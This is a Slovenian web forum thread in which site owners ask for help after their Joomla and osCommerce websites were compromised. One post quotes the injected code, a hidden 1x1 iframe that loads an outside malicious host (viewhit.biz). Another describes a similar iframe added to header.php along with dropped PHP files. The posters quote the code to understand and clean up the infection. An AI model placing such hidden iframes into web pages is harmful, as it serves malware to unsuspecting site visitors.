Vdor v večje stevilo internetnih strani

3356288721719

1. jul 2009 ob 12:47

Pozdravljeni,

na parih spletnih straneh se je zgodil vdor in prosim za informacije in pomoc.

http://www.racunovodskiservis.info
http://www.anasan.si/
http://avtizem.info/
http://cnvos.info/
(avast mi ne pusti gor, Chrome pa javi Malware)
http://cnvos.si/

Najverjetneje se bo iskalo tudi nekoga, ki ve za kaj gre, da zadevo razcisti in pregleda. Mislim da se bo kmalu javil tudi clovek, ki ima cez te strani.

Zaenkrat pa iscem kakrsnekoli informacije o tej skripti:

<iframe src ="http://viewhit.biz" width=1 height=1 style="visibility:hidden">ho $database->_ticker . ' queries executed';

    echo '<pre>';
    foreach ($database->_log as $k=>$sql) {
        echo $k+1 . "\n" . $sql . '<hr />';
    }
    echo '</pre>';
}

doGzip();

?>

Kaj dela ta skripta? Kako je prislo do vdora? Kraja FTP gesel ali kako drugace? Mislite da je prislo prov do vdora na streznik ponudnika? Je mozno da so podatki v bazi kontanimirani? Pri eniih javlja error, pri enih je samo prazna stran (+ izvorna koda), pri enih pa proba povezat na nek cuden pejdz...

Zanimivo je, da so zadeve na locenih streznikih, pri drugacnih ponudnikih gostovanja, razlicne verzije Joomle (1.0 in 1.5) - nekdo se je nacrtno spravil na Joomla related strani teh ljudi.

4351

spletni strežniki joomla

urosbe

440625253

24. maj 2010 ob 14:13

Tema je res da že skorajda leto dni stara, vendar se nanjo navezuje moje vprašanje. Na svojem strežniku gostujem nekaj spletnih strani (raznorazne privat projekte, pa še kakšen portal od kolegov...).
V soboto sem od Google Webmaster prejel e-mail z informacijo, da ena izmed strani okužena z zlonamerno kodo. Gre za stran, ki bazira na osscommerce-u in sicer je bil v header.php dodan iframe z linkom na my654bestsite.com + dodanih nekaj datotek (floops.php, fsp.php ter f_index.php). Sedaj me pa zanima, kako je lahko to prišlo gor? FTP odpade, saj imam odprtega zgolj na nekatere statične IP-je, poleg tega sem preveril log in so notri zgolj moji dostopi, ničesar drugega. Ima oscommerce kakšno varnostno luknjo, za katero ne vem?

bl4ckb1rd

11227509111

24. maj 2010 ob 14:58

Jap. Strežnik nimaš zavarovan primerno, zato je preko določene luknje v oscommercu ali druge skripte, ki teče na tvojem strežniku prišel v strežnik črv, ki se zapiše v določene .php datoteke. Tudi če ga odstraniš, je luknja še vedno tam, kar pomeni da ti bo čez kak dan spet vdrl v strežnik. Ker stvari nisi uredil v doglednem času je tvojo stran opazil google s svojimi spiderji in te dal na blacklisto. Oz. če še nisi na black listi, boš na njej pristal kmalu. Postopek da prideš iz blackliste pa je precej siten...

auto-spy

129892416128

24. maj 2010 ob 18:00

Danes sem pa jaz imel vdor v svoj blog na blog.siol.net
Bila je objavljena ena novica o SEO specifikacijah v angleščini seveda.
Kako je pa to možno?

bl4ckb1rd

11227509111

24. maj 2010 ob 18:29

Jah, tko da tut siol ni vsemogočen :)

urosbe

440625253

24. maj 2010 ob 20:34

Hm zanimivo, potem bo res kakšna luknja v oscommerce, kajti še nikoli do sedaj ni nihče vdrl v nobeno drugo stran (pa so poskušali z raznimi sql injectioni). Res pa je, da so vsi moji projekti custom made, razen spornega kolegovega projekta, ki si je trgovino postavil na oscommerce.

Vdor v večje stevilo internetnih strani

10 naročnikov

15 odgovorov

Vdor v večje stevilo internetnih strani 10 naročnikov

15 odgovorov

Vdor v večje stevilo internetnih strani

10 naročnikov